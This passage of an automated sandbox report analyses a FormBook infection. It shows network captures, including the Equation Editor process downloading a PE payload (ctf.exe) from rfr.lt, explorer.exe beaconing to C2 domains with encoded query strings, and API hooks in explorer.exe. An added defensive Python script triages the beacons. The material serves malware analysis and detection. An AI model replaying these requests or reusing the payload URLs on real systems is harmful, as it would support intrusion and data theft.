                                            Jan 14, 2022 08:05:05.862081051 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.862123013 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.862154007 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.862206936 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.862217903 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.862258911 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.862288952 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.862333059 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.862345934 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.862380028 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.862416029 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.862478018 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.862499952 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.862557888 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.862569094 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.862607002 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.862627983 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.862659931 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.862720966 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.863198042 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.913188934 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.913225889 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.913254976 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.913284063 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.913321018 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.913346052 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.913361073 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.913393021 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.913414001 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.913444996 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.913460016 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.913491964 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.913510084 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.913541079 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.913572073 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.913585901 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.913615942 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.913639069 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.913654089 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.913686991 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.913703918 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.913734913 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.913765907 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.913796902 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.913810968 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.913841963 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.913876057 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.913898945 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.913928032 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.913957119 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.913989067 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.914016008 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.914025068 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.914055109 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.914078951 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162

                                            UDP Packets

                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                            Jan 14, 2022 08:05:05.660314083 CET | 52167 | 53 | 192.168.2.22 | 8.8.8.8
                                            Jan 14, 2022 08:05:05.679891109 CET | 53 | 52167 | 8.8.8.8 | 192.168.2.22
                                            Jan 14, 2022 08:06:29.366249084 CET | 50591 | 53 | 192.168.2.22 | 8.8.8.8
                                            Jan 14, 2022 08:06:29.511981964 CET | 53 | 50591 | 8.8.8.8 | 192.168.2.22
                                            Jan 14, 2022 08:06:47.769885063 CET | 57805 | 53 | 192.168.2.22 | 8.8.8.8
                                            Jan 14, 2022 08:06:47.791002035 CET | 53 | 57805 | 8.8.8.8 | 192.168.2.22

                                            DNS Queries

                                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                            Jan 14, 2022 08:05:05.660314083 CET | 192.168.2.22 | 8.8.8.8 | 0x8c5 | Standard query (0) | rfr.lt | A (IP address) | IN (0x0001)
                                            Jan 14, 2022 08:06:29.366249084 CET | 192.168.2.22 | 8.8.8.8 | 0xfc43 | Standard query (0) | www.ponto-bras.space | A (IP address) | IN (0x0001)
                                            Jan 14, 2022 08:06:47.769885063 CET | 192.168.2.22 | 8.8.8.8 | 0x9c63 | Standard query (0) | www.hydrogendatapower.com | A (IP address) | IN (0x0001)

                                            DNS Answers

                                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                            Jan 14, 2022 08:05:05.679891109 CET | 8.8.8.8 | 192.168.2.22 | 0x8c5 | No error (0) | rfr.lt | - | 91.203.68.162 | A (IP address) | IN (0x0001)
                                            Jan 14, 2022 08:06:29.511981964 CET | 8.8.8.8 | 192.168.2.22 | 0xfc43 | No error (0) | www.ponto-bras.space | shops.myshopify.com | - | CNAME (Canonical name) | IN (0x0001)
                                            Jan 14, 2022 08:06:29.511981964 CET | 8.8.8.8 | 192.168.2.22 | 0xfc43 | No error (0) | shops.myshopify.com | - | 23.227.38.74 | A (IP address) | IN (0x0001)
                                            Jan 14, 2022 08:06:47.791002035 CET | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | www.hydrogendatapower.com | parkingpage.namecheap.com | - | CNAME (Canonical name) | IN (0x0001)
                                            Jan 14, 2022 08:06:47.791002035 CET | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | parkingpage.namecheap.com | - | 198.54.117.212 | A (IP address) | IN (0x0001)
                                            Jan 14, 2022 08:06:47.791002035 CET | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | parkingpage.namecheap.com | - | 198.54.117.217 | A (IP address) | IN (0x0001)
                                            Jan 14, 2022 08:06:47.791002035 CET | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | parkingpage.namecheap.com | - | 198.54.117.210 | A (IP address) | IN (0x0001)
                                            Jan 14, 2022 08:06:47.791002035 CET | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | parkingpage.namecheap.com | - | 198.54.117.215 | A (IP address) | IN (0x0001)
                                            Jan 14, 2022 08:06:47.791002035 CET | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | parkingpage.namecheap.com | - | 198.54.117.211 | A (IP address) | IN (0x0001)
                                            Jan 14, 2022 08:06:47.791002035 CET | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | parkingpage.namecheap.com | - | 198.54.117.216 | A (IP address) | IN (0x0001)
                                            Jan 14, 2022 08:06:47.791002035 CET | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | parkingpage.namecheap.com | - | 198.54.117.218 | A (IP address) | IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • rfr.lt
                                            • www.ponto-bras.space
                                            • www.hydrogendatapower.com

                                            HTTP Packets

                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            0 | 192.168.2.22 | 49165 | 91.203.68.162 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                            Timestamp | kBytes transferred | Direction | Data
                                            Jan 14, 2022 08:05:05.749198914 CET | 0 | OUT | GET /ctf.exe HTTP/1.1
                                            Accept: */*
                                            Accept-Encoding: gzip, deflate
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                            Host: rfr.lt
                                            Connection: Keep-Alive
                                            Jan 14, 2022 08:05:05.809087038 CET | 2 | IN | HTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Fri, 14 Jan 2022 07:05:05 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 248302
                                            Last-Modified: Thu, 13 Jan 2022 11:11:05 GMT
                                            Connection: keep-alive
                                            ETag: "61e008c9-3c9ee"
                                            Expires: Sun, 13 Feb 2022 07:05:05 GMT
                                            Cache-Control: max-age=2592000
                                            Accept-Ranges: bytes
                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 75 4a a8 a1 14 24 fb a1 14 24 fb a1 14 24 fb 2f 1c 7b fb a3 14 24 fb a1 14 25 fb 3a 14 24 fb 22 1c 79 fb b0 14 24 fb f5 37 14 fb a8 14 24 fb 66 12 22 fb a0 14 24 fb 52 69 63 68 a1 14 24 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c9 cd ef 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5a 00 00 00 d4 01 00 00 04 00 00 25 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 73 00 00 b4 00 00 00 00 c0 02 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 76 59 00 00 00 10 00 00 00 5a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 11 00 00 00 70 00 00 00 12 00 00 00 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 af 01 00 00 90 00 00 00 04 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 00 09 00 00 00 c0 02 00 00 0a 00 00 00 74 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$uJ$$$/{$%:$"y$7$f"$Rich$PELHZ%2p@sp.textvYZ `.rdatap^@@.datap@.ndata@.rsrct@@


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            1 | 192.168.2.22 | 49166 | 23.227.38.74 | 80 | C:\Windows\explorer.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Jan 14, 2022 08:06:29.538696051 CET | 265 | OUT | GET /nk6l/?f4=dUEi0UXeDjZ3satn024Wp6SV8B9ayfLzJlVAsh/H0s9uKTFfRfoB4Zp7QfR2IB/+as7LEQ==&9r7t=5jSPntk89D HTTP/1.1
                                            Host: www.ponto-bras.space
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Jan 14, 2022 08:06:29.588784933 CET | 266 | IN | HTTP/1.1 403 Forbidden
                                            Date: Fri, 14 Jan 2022 07:06:29 GMT
                                            Content-Type: text/html
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Sorting-Hat-PodId: -1
                                            X-Dc: gcp-europe-west1
                                            X-Request-ID: 99fb20a9-766c-40f0-9df4-b158c5fb1252
                                            X-Content-Type-Options: nosniff
                                            X-Permitted-Cross-Domain-Policies: none
                                            X-XSS-Protection: 1; mode=block
                                            X-Download-Options: noopen
                                            CF-Cache-Status: DYNAMIC
                                            Server: cloudflare
                                            CF-RAY: 6cd5059eac695c85-FRA
                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                            Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 
70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73
                                            Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;dis


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            2 | 192.168.2.22 | 49168 | 198.54.117.212 | 80 | C:\Windows\explorer.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Jan 14, 2022 08:06:47.968044043 CET | 272 | OUT | GET /nk6l/?f4=mG3MZX+V/2vUvLkm+jLYc6BPCVMMOHSbAyziOVKuBi9N3RYpJJdcI8Zb3DbFfMMicqDibw==&9r7t=5jSPntk89D HTTP/1.1
                                            Host: www.hydrogendatapower.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Jan 14, 2022 08:06:48.522605896 CET | 272 | OUT | GET /nk6l/?f4=mG3MZX+V/2vUvLkm+jLYc6BPCVMMOHSbAyziOVKuBi9N3RYpJJdcI8Zb3DbFfMMicqDibw==&9r7t=5jSPntk89D HTTP/1.1
                                            Host: www.hydrogendatapower.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
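Three things in the HTTP sessions above matter more than the packet timings. Session 0 is EQNEDT32.EXE, a process that has no business speaking HTTP, fetching /ctf.exe from rfr.lt and receiving a PE image (the body starts with MZ, is served as application/octet-stream, and its 248302-byte Content-Length matches the word.exe dropped under AppData\Roaming). Sessions 1 and 2 are the FormBook beacons from the injected explorer.exe: a GET to a short path (/nk6l/) with two query parameters, a bare Host header, Connection: close and no User-Agent. The same parameter names and the same second value (9r7t=5jSPntk89D) appear in both, which makes them a useful pivot for other traffic from this build. The DNS answers are also telling: www.ponto-bras.space is a CNAME to shops.myshopify.com and answers 403, and www.hydrogendatapower.com resolves to a Namecheap parking page and never answers, so neither is a live C2 in this run. FormBook's configuration carries a list of domains of which most are decoys, so a blocklist built from every domain it contacts will include hosts that have nothing to do with the actor. The Python below encodes those checks; it is an added example, not part of the report. It parses the raw requests into structured records, scores them against the beacon shape and the Office-helper download rule, derives the pivot key and classifies each beacon target from its DNS answer and HTTP status. The request text, destinations, CNAMEs and status codes are copied from this report; the helper-process list, the parking/hosting suffix list and the score threshold are assumptions made for the example.

```python
"""Triage sandbox HTTP sessions for Office-helper downloads and FormBook-style beacons."""
import re
from urllib.parse import urlsplit

# Constructed input: the three sessions from this report. Request text, destination, DNS
# CNAME, status and response prefix are copied from the report; the record layout and the
# None/empty values where the report shows no reply are ours.
SESSIONS = [
    {"process": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "dst": "91.203.68.162", "cname": None, "status": 200,
     "content_type": "application/octet-stream",
     "response_head": bytes.fromhex("4d 5a 90 00 03 00 00 00"),
     "request": "GET /ctf.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\n"
                "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; "
                "SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; "
                ".NET4.0C; .NET4.0E)\r\nHost: rfr.lt\r\nConnection: Keep-Alive\r\n\r\n"},
    {"process": r"C:\Windows\explorer.exe", "dst": "23.227.38.74",
     "cname": "shops.myshopify.com", "status": 403, "content_type": "text/html", "response_head": b"",
     "request": "GET /nk6l/?f4=dUEi0UXeDjZ3satn024Wp6SV8B9ayfLzJlVAsh/H0s9uKTFfRfoB4Zp7QfR2IB/+as7LEQ=="
                "&9r7t=5jSPntk89D HTTP/1.1\r\nHost: www.ponto-bras.space\r\nConnection: close\r\n\r\n"},
    {"process": r"C:\Windows\explorer.exe", "dst": "198.54.117.212",
     "cname": "parkingpage.namecheap.com", "status": None, "content_type": None, "response_head": b"",
     "request": "GET /nk6l/?f4=mG3MZX+V/2vUvLkm+jLYc6BPCVMMOHSbAyziOVKuBi9N3RYpJJdcI8Zb3DbFfMMicqDibw=="
                "&9r7t=5jSPntk89D HTTP/1.1\r\nHost: www.hydrogendatapower.com\r\nConnection: close\r\n\r\n"},
]

# Assumptions for the example, not data from the report.
OFFICE_HELPERS = {"eqnedt32.exe", "excel.exe", "winword.exe", "powerpnt.exe"}
DECOY_SUFFIXES = ("myshopify.com", "parkingpage.namecheap.com")   # hosting that cannot be this C2
BASE64ISH = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
BEACON_THRESHOLD = 4


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, query pairs and lower-cased headers.
    The query is split by hand: urllib's parse_qsl turns '+' into a space, which would
    corrupt the base64 values these beacons carry."""
    head = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    method, target, _version = head[0].split(" ", 2)
    url = urlsplit(target)
    query = [tuple(kv.split("=", 1)) if "=" in kv else (kv, "") for kv in url.query.split("&") if kv]
    headers = {}
    for line in head[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": url.path, "query": query, "headers": headers}


def is_office_download(session):
    """An Office helper process pulling a PE image over HTTP is the stage-two download."""
    exe = session["process"].rsplit("\\", 1)[-1].lower()
    got_pe = session["response_head"].startswith(b"MZ") or session["content_type"] == "application/octet-stream"
    return exe in OFFICE_HELPERS and got_pe


def beacon_score(req):
    """Score a request against the FormBook beacon shape seen in sessions 1 and 2."""
    score, reasons = 0, []
    if req["method"] == "GET" and re.fullmatch(r"/[a-z0-9]{2,8}/", req["path"]):
        score += 1; reasons.append("single short path segment")
    q = req["query"]
    if len(q) == 2 and BASE64ISH.fullmatch(q[0][1]) and q[1][1].isalnum():
        score += 2; reasons.append("two parameters, first base64-like")
    h = req["headers"]
    if set(h) == {"host", "connection"} and h["connection"].lower() == "close":
        score += 2; reasons.append("only Host and Connection: close, no User-Agent")
    return score, reasons


def pivot_key(req):
    """Sample-level constants to hunt on: both parameter names plus the second value."""
    q = req["query"]
    return (q[0][0], q[1][0], q[1][1]) if len(q) == 2 else None


def classify_target(session):
    if session["cname"] and session["cname"].endswith(DECOY_SUFFIXES):
        return "decoy or parked host (CNAME to %s)" % session["cname"]
    if session["status"] in (None, 403, 404):
        return "no usable reply (status %s)" % session["status"]
    return "responded, treat as live C2 candidate"


def triage(sessions):
    rows = []
    for s in sessions:
        req = parse_request(s["request"])
        score, reasons = beacon_score(req)
        beacon = score >= BEACON_THRESHOLD
        rows.append({"process": s["process"].rsplit("\\", 1)[-1], "host": req["headers"].get("host"),
                     "office_download": is_office_download(s), "beacon": beacon, "reasons": reasons,
                     "pivot": pivot_key(req) if beacon else None,
                     "target": classify_target(s) if beacon else None})
    return rows


if __name__ == "__main__":
    for row in triage(SESSIONS):
        print(row)
```

Run against the three sessions, session 0 is reported as the Office-helper download and scores zero on the beacon rules, while sessions 1 and 2 both clear the beacon threshold, share the pivot ("f4", "9r7t", "5jSPntk89D") and are classified as decoy or parked targets. The scoring is deliberately structural (path shape, parameter shape, header set) rather than keyed on the literal path or parameter names, since those are per-build constants that change with the next sample.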


                                            Code Manipulations

                                            User Modules

                                            Hook Summary

                                            Function Name | Hook Type | Active in Processes
                                            PeekMessageA | INLINE | explorer.exe
                                            PeekMessageW | INLINE | explorer.exe
                                            GetMessageW | INLINE | explorer.exe
                                            GetMessageA | INLINE | explorer.exe

                                            Processes

                                            Process: explorer.exe, Module: USER32.dll
                                            Function Name | Hook Type | New Data
                                            PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xEF
                                            PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xEF
                                            GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xEF
                                            GetMessageA | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xEF

                                            Statistics

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Start time:08:05:20
                                            Start date:14/01/2022
                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                            Imagebase:0x13fc20000
                                            File size:28253536 bytes
                                            MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:08:05:39
                                            Start date:14/01/2022
                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                            Imagebase:0x400000
                                            File size:543304 bytes
                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                            Has elevated privileges:true
